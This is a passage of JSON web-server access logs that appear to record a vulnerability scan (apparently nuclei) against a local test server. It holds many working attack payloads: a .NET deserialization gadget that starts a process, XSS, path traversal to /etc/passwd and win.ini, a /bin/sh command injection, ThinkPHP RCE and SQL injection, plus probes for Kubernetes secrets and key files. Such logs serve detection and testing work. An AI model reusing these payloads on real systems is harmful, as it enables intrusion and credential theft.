UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29KAnlADPjqWesDvmIZJdFKnrzJ/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/29KAnfXH5Mcc6lYxNwYIC5QcBLU HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 